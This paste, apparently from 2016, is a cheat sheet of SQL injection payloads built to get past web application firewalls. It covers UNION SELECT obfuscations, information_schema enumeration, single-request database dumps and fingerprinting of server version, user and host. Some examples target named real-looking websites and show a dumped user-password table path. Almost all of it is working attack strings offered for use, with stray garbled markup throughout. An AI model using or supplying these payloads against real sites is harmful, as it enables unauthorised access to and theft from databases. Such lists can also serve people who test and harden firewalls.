
WAF Bypass sqli

Mar 22nd, 2016
  1. WAF evasion methods for sql Injections
  3. I want to share WAF evasion methods for sql Injections. Most are old but a few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.
  5. 1) id=1+UnIoN+SeLecT 1,2,3 --+
  7. 2) id=1+UnIOn/**/SeLect 1,2,3 --+
  9. 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
  11. 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
  13. 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
  15. 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
  17. 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
  19. 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
  21. /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  23. 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  25. div + 0
  26. Having +1 = 0
  27. AND+ 1 = 0
  28. /*!and*/ +1 = 0
  29. and( 1 )=(0 ) x
  30. OR false the url query
  31. id =- 1 union all select
  32. id =null union all select
  33. id =1 +and+ false + union +all +select
  34. id = 9999 union all select
  36. +union+distinct+select+
  37. +union+distinctROW+select+
  38. /**//*!12345UNION SELECT*//**/
  39. /**//*!50000UNION SELECT*//
  41. http : //'
  42. +and(1)=(0) +union+distinct+select+ 1
  43. and use: and 1=0 to make the column number appear in the page
  44. or
  45. +div+0
  46. Having+1=0
  47. +AND+1=0
  48. +/*!and*/+1=0
  49. and(1)=(0‏)
  51. Hard WAF bypass tips
  52. Whitespaces :
  53. union(select(0),version(),(0),(0),(0),(0),(0),(0),
  54. (0))
  55. %0Aunion%0Aselect%0A1,2,3--
  56. /**/union/**/select/**/1,2,3--
  57. like ::
  58. PHP Code:
  59. http ://
  60. list_itinerary.php?id=-4%20union
  61. %20%28select%201,2,version
  62. %28%29,4,5,6,7,8%29%20--
  63. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  68. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  69. Bypassing ::
  70. (Double Keyword): UNIunionON+SELselectECT
  71. +union+distinct+select+
  72. +union+distinctROW+select+
  73. union+/*!select*/+1,2,3
  74. union/**/select/**/1,2,3
  75. uni<on all sel<ect
  76. %20union%20/*!select*/%20
  77. /**//*!union*//**//*!select*//**/
  78. union%23aa%0Aselect
  79. /**/union/*!50000select*/
  80. /*!20000%0d%0aunion*/+/*!20000%0d
  81. %0aSelEct*/
  82. %252f%252a*/UNION%252f%252a /SELECT%252f
  83. %252a*/
  84. +%23sexsexsex%0AUnIOn%23sexsexsex
  85. %0ASeLecT+
  86. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  87. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  88. like ::
  89. PHP Code:
  90. http ://
  91. list_itinerary.php?id=-4%20union
  92. %23aa%0Aselect%201,2,version
  93. %28%29,4,5,6,7,8%20--
  94. PHP Code:
  95. http ://
  96. list_itinerary.php?id=-4%20/**/
  97. union/*!50000select*/
  98. %201,2,version
  99. %28%29,4,5,6,7,8%20--
  100. PHP Code:
  101. http ://
  102. list_itinerary.php?id=-4%20/*!
  103. 20000%0d%0aunion*/+/*!20000%0d
  104. %0aSelEct*/%201,2,version
  105. %28%29,4,5,6,7,8%20--
  106. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  107. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  108. after id no. like id=1 +/*!and*/+1=0
  109. +div+0
  110. Having+1=0
  111. +AND+1=0
  112. +/*!and*/+1=0
  113. and(1)=(0)
  114. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  115. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  116. false the url query :
  117. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  118. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  119. id= - 1 union all select
  120. id= null union all select
  121. id=1 +and+false+ union+all+select
  122. id= 9999 union all select
  123. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  124. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  125. Order Bypassing do like this
  126. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  127. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  128. /*!table_name*/
  129. +from /*!information_schema*/./*!tables*/ where
  130. table_schema=database()
  131. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  132. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  133. unhex(hex(Concat
  134. (Column_Name,0x3e,Table_schema,0x3e,table_
  135. Name)))
  136. /*!from*/information_schema.columns/*!where*/
  137. column_name%20/*!like*/char(37,%20112,%2097,
  138. %20115,%20115,%2037)
  139. like ::
  140. PHP Code:
  141. http ://
  142. article.php?
  143. article_id=-117%20union%20select
  144. %201,2,unhex%28hex%28Concat
  145. %28Column_Name,0x3e,Table_
  146. schema, 0x3e,table_Name
  147. %29%29%29,4,5,6,7/*!from*/
  148. information_schema.columns/*!
  149. where*/column_name%20/*!like*/
  150. char%2837,%20112,%2097,%20115,
  151. %20115,%2037%29--
  152. user_passwd>westbur6_website>user_info
  153. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  154. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  155. used with order ::
  156. convert( using ascii) or unhex(hex())
  157. like :
  158. PHP Code:
  159. www. westbury. com/ article. php?
  160. article_id =- 117 union select 1 , 2 ,
  161. convert ( group_concat
  162. (table_name ) using ascii ), 4 , 5 ,6 , 7 +
  163. from +information_schema .tables --
  164. If 'ascii' doesn't work, you can try:
  165. PHP Code:
  166. ujis
  167. ucs2
  168. tis620
  169. swe7
  170. sjis
  171. macroman
  172. macce
  173. latin7
  174. latin5
  175. latin2
  176. koi8u
  177. koi8r
  178. keybcs2
  179. hp8
  180. geostd8
  181. gbk
  182. gb2132
  183. armscii8
  184. ascii
  185. binary
  186. cp1250
  187. big5
  188. cp1251
  189. cp1256
  190. cp1257
  191. cp850
  193. ------------------------------Best Bypass WAF------------------------------------
  195. [~] order by [~]
  196. /**/ORDER/**/BY/**/
  197. /*!order*/+/*!by*/
  198. /*!ORDER BY*/
  199. /*!50000ORDER BY*/
  200. /*!50000ORDER*//**//*!50000BY*/
  201. /*!12345ORDER*/+/*!BY*/
  203. [~] UNION select [~]
  204. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  205. %55nion(%53elect 1,2,3)-- -
  206. +union+distinct+select+
  207. +union+distinctROW+select+
  208. /**//*!12345UNION SELECT*//**/
  209. /**//*!50000UNION SELECT*//**/
  210. /**/UNION/**//*!50000SELECT*//**/
  211. /*!50000UniON SeLeCt*/
  212. union /*!50000%53elect*/
  213. + #?uNiOn + #?sEleCt
  214. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  215. /*!%55NiOn*/ /*!%53eLEct*/
  216. /*!u%6eion*/ /*!se%6cect*/
  217. +un/**/ion+se/**/lect
  218. uni%0bon+se%0blect
  219. %2f**%2funion%2f**%2fselect
  220. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  221. REVERSE(noinu)+REVERSE(tceles)
  222. /*--*/union/*--*/select/*--*/
  223. union (/*!/**/ SeleCT */ 1,2,3)
  224. /*!union*/+/*!select*/
  225. union+/*!select*/
  226. /**/union/**/select/**/
  227. /**/uNIon/**/sEleCt/**/
  228. +%2F**/+Union/*!select*/
  229. /**//*!union*//**//*!select*//**/
  230. /*!uNIOn*/ /*!SelECt*/
  231. +union+distinct+select+
  232. +union+distinctROW+select+
  233. uNiOn aLl sElEcT
  234. UNIunionON+SELselectECT
  235. /**/union/*!50000select*//**/
  236. 0%a0union%a0select%09
  237. %0Aunion%0Aselect%0A
  238. %55nion/**/%53elect
  239. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  240. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  241. %0A%09UNION%0CSELECT%10NULL%
  242. /*!union*//*--*//*!all*//*--*//*!select*/
  243. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  244. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  245. +UnIoN/*&a=*/SeLeCT/*&a=*/
  246. union+sel%0bect
  247. +uni*on+sel*ect+
  248. +#1q%0Aunion all#qa%0A#%0Aselect
  249. union(select (1),(2),(3),(4),(5))
  250. UNION(SELECT(column)FROM(table))
  251. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  252. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  253. union(select(1),2,3)
  254. union (select 1111,2222,3333)
  255. uNioN (/*!/**/ SeleCT */ 11)
  256. union (select 1111,2222,3333)
  257. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  258. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  259. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  260. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  261. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  262. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  263. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  264. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  265. /union\sselect/g
  266. /union\s+select/i
  267. /*!UnIoN*/SeLeCT
  268. +UnIoN/*&a=*/SeLeCT/*&a=*/
  269. +uni>on+sel>ect+
  270. +(UnIoN)+(SelECT)+
  271. +(UnI)(oN)+(SeL)(EcT)
  272. +’UnI”On’+'SeL”ECT’
  273. +uni on+sel ect+
  274. +/*!UnIoN*/+/*!SeLeCt*/+
  275. /*!u%6eion*/ /*!se%6cect*/
  276. uni%20union%20/*!select*/%20
  277. union%23aa%0Aselect
  278. /**/union/*!50000select*/
  279. /^.*union.*$/ /^.*select.*$/
  280. /*union*/union/*select*/select+
  281. /*uni X on*/union/*sel X ect*/
  282. +un/**/ion+sel/**/ect+
  283. +UnIOn%0d%0aSeleCt%0d%0a
  284. UNION/*&test=1*/SELECT/*&pwn=2*/
  285. un?<ion sel="">+un/**/ion+se/**/lect+
  286. +UNunionION+SEselectLECT+
  287. +uni%0bon+se%0blect+
  288. %252f%252a*/union%252f%252a /select%252f%252a*/
  289. /%2A%2A/union/%2A%2A/select/%2A%2A/
  290. %2f**%2funion%2f**%2fselect%2f**%2f
  291. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  292. /*!UnIoN*/SeLecT+
  294. [~] information_schema.tables [~]
  295. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  296. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  297. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  298. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  299. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  300. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  302. [~] concat() [~]
  303. CoNcAt()
  304. concat()
  305. CON%08CAT()
  306. CoNcAt()
  307. %0AcOnCat()
  308. /**//*!12345cOnCat*/
  309. /*!50000cOnCat*/(/*!*/)
  310. unhex(hex(concat(table_name)))
  311. unhex(hex(/*!12345concat*/(table_name)))
  312. unhex(hex(/*!50000concat*/(table_name)))
  314. [~] group_concat() [~]
  315. /*!group_concat*/()
  316. gRoUp_cOnCAt()
  317. group_concat(/*!*/)
  318. group_concat(/*!12345table_name*/)
  319. group_concat(/*!50000table_name*/)
  320. /*!group_concat*/(/*!12345table_name*/)
  321. /*!group_concat*/(/*!50000table_name*/)
  322. /*!12345group_concat*/(/*!12345table_name*/)
  323. /*!50000group_concat*/(/*!50000table_name*/)
  324. /*!GrOuP_ConCaT*/()
  325. /*!12345GroUP_ConCat*/()
  326. /*!50000gRouP_cOnCaT*/()
  327. /*!50000Gr%6fuP_c%6fnCAT*/()
  328. unhex(hex(group_concat(table_name)))
  329. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  330. unhex(hex(/*!12345group_concat*/(table_name)))
  331. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  332. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  333. unhex(hex(/*!50000group_concat*/(table_name)))
  334. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  335. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  336. convert(group_concat(table_name)+using+ascii)
  337. convert(group_concat(/*!table_name*/)+using+ascii)
  338. convert(group_concat(/*!12345table_name*/)+using+ascii)
  339. convert(group_concat(/*!50000table_name*/)+using+ascii)
  340. CONVERT(group_concat(table_name)+USING+latin1)
  341. CONVERT(group_concat(table_name)+USING+latin2)
  342. CONVERT(group_concat(table_name)+USING+latin3)
  343. CONVERT(group_concat(table_name)+USING+latin4)
  344. CONVERT(group_concat(table_name)+USING+latin5)
  345. Group_Concat
  346. group_concat ()
  347. /*!group_concat*/ ()
  348. grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
  349. group_concat (, 0x3c62723e )
  350. g % 72oup_c % 6Fncat % 28 % 76% 65rsion
  351. % 28 %29 ,% 22 ~ BlackRose% 22 %29
  352. CoNcAt ()
  353. CONCAT (DISTINCT Version ())
  354. concat (, 0x3a ,)
  355. concat %00 ()
  356. % 00CoNcAt ()
  357. /*!50000cOnCat*/ ( /*!Version()*/ )
  358. /*!50000cOnCat*/
  359. /**//*!12345cOnCat*/ (, 0x3a ,)
  360. concat_ws ()
  361. concat (0x3a ,, 0x3c62723e )
  362. /*!concat_ws(0x3a,)*/
  363. concat_ws ( 0x3a3a3a , version()
  364. CONCAT_WS ( CHAR ( 32, 58, 32 ), version
  365. (),)
  366. REVERSE( tacnoc )
  367. binary (version ())
  368. uncompress (compress ( version()))
  369. aes_decrypt ( aes_encrypt ( version
  370. (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
  372. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  373. +div+0
  374. Having+1=0
  375. +AND+1=0
  376. +/*!and*/+1=0
  377. and(1)=(0)
  378. cp852
  379. cp866
  380. cp932
  381. dec8
  382. euckr
  383. latin1
  384. utf8
  385. trick to appear info inside img tag
  386. PHP Code:
  387. concat( 0x223e3c62723e ,, 0x3c696d
  388. 67207372633d22 )
  389. when the column output lands inside an HTML tag, but it is not
  390. always inside an img tag.
  391. it could be <a> or </noscript> or anything.
  392. like ::
  393. PHP Code:
  394. http ://
  395. public/detail.php?
  396. id=-168' union /*!
  397. %53elect*/ concat
  398. (0x223e3c2f613e3c2f74643e,
  399. version
  400. (),0x3c6120687265663d22)--+
  402. [DUMP DB in 1 Request]
  403. PHP Code:
  404. ( select (@) from ( select(@:= 0x00 ),
  405. ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
  406. (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
  407. ( select(@) from ( select (@:= 0x00 ),
  408. ( select (@) from ( table ) where (@) in (@:= concat
  409. (@, 0x0a , column1 , 0x3a , column2 )))) a )
  411. [DUMP DB in 1 Request improve]
  412. PHP Code:
  413. ( select(@ x ) from (select (@x := 0x00 ),
  414. ( select( 0 ) from
  415. ( information_schema . columns) where
  416. ( table_schema !
  417. = 0x696e666f726d6174696f6e5f736368656d61 )and
  418. ( 0x00 ) in(@ x := concat
  419. (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
  420. like
  421. http : //
  422. id=-13 union select 1,2,(select
  423. (@x)from(select(@x:=0x00),(select
  424. (0)from(information_schema.colu​​
  425. mns)where(table_schema!
  426. =0x696e666f726d6174696f6e5f736368656d61)and
  427. (0x00)in(@x:=​c​oncat
  428. (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
  431. %09 %0A %0B %0C %0D %A0
  432. get version - DB_NAME - user - HOST_NAME -
  433. datadir
  434. PHP Code:
  435. version()
  436. convert( version() using latin1 )
  437. unhex ( hex( version()))
  439. ( substr
  440. (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
  441. # like #
  442. www. marinaplast. com/ page . php?
  443. id =- 13 union select 1 , 2 ,( substr
  444. (@@version ,1 , 1 )=5 ), 4, 5 --
  445. 1 means version 5 and 0 means version 4
  446. +and substring(version(),1,1)=4
  447. +and substring(version(),1,1)=5
  448. +and substring(version(),1,1)=9
  449. +and substring(version(),1,1)=10
  450. # like #
  452. id=13+and substring(version
  453. (),1,1)=5
  454. download good version 5
  456. id=13+and substring(version
  457. (),1,1)=4
  458. not download good version 4
  459. version 5
  460. id=1 /*!50094aaaa*/ error
  461. id=1 /*!50095aaaa*/ no error
  462. id=1 /*!50096aaaa*/ error
  463. # like #
  464. /
  465. *!50095aaaa*/ no error v5
  466. version 4
  467. id=1 /*!40123 1=1*/--+- no error
  468. id=1 /*!40122rrrr*/ no error
  469. # like #
  470. /
  471. *!40122rrrr*/ error not v4
  472. ☆¸.•*☆ ☆*•.¸☆
  473. DB_NAME()
  474. @@database
  475. database()
  476. id=vv()
  477. # like #
  479. id=-13 union select 1,2,DB_NAME
  480. (),4,5 --
  482. ()
  483. ☆¸.•*☆ ☆*•.¸☆
  484. @@user
  485. user()
  486. user_name()
  487. system_user()
  488. # like #
  490. id=-13 union select 1,2,user
  491. (),4,5 --
  492. ☆¸.•*☆ ☆*•.¸☆
  493. HOST_NAME()
  494. @@hostname
  495. @@servername
  497. # like #
  499. id=-13 union select 1,2,HOST_NAME
  500. (),4,5 --
  501. ☆¸.•*☆ ☆*•.¸☆
  502. @@datadir
  503. datadir()
  504. # like #
  506. id=-13 union select 1,2,datadir(),4,5 --
  507. ☆¸.•*☆ ☆*•.¸☆
  508. ASPX
  509. and 1=0/@@version
  510. ' and 1 =0 /@@ version;--
  511. ) and 1 =@@version--
  512. and 1 = 0 /user ;--